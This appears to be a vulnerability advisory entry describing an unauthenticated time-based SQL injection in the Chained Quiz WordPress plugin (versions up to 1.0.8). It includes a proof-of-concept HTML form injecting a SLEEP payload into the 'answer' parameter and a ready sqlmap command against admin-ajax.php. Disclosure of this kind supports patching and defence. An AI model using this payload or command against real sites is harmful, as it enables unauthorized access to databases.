Lucene search

K
wpexploitÇlirim EminiWPEX-ID:FAA47CAE-BCCD-49D6-A3CB-2E811EBAB9FD
HistoryAug 16, 2018 - 12:00 a.m.

Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection

2018-08-1600:00:00
Γ‡lirim Emini
8

0.01 Low

EPSS

Percentile

83.8%

WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the β€˜answer’ and β€˜answers’ parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the β€œ$answer” backend variable. Privileges required: None

The following exploit will cause the SQL query to execute and sleep for 10 seconds:

<html>
  <body>
    <form action="http://target/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="answer" value="8 AND SLEEP(10)" />
      <input type="hidden" name="question&#95;id" value="194" />
      <input type="hidden" name="quiz&#95;id" value="581" />
      <input type="hidden" name="post&#95;id" value="3199" />
      <input type="hidden" name="question&#95;type" value="radio" />
      <input type="hidden" name="points" value="0" />
      <input type="hidden" name="action" value="chainedquiz&#95;ajax" />
      <input type="hidden" name="chainedquiz&#95;action" value="answer" />
      <input type="hidden" name="total&#95;questions" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Using SQLMAP:

sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=5&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T

0.01 Low

EPSS

Percentile

83.8%

Related for WPEX-ID:FAA47CAE-BCCD-49D6-A3CB-2E811EBAB9FD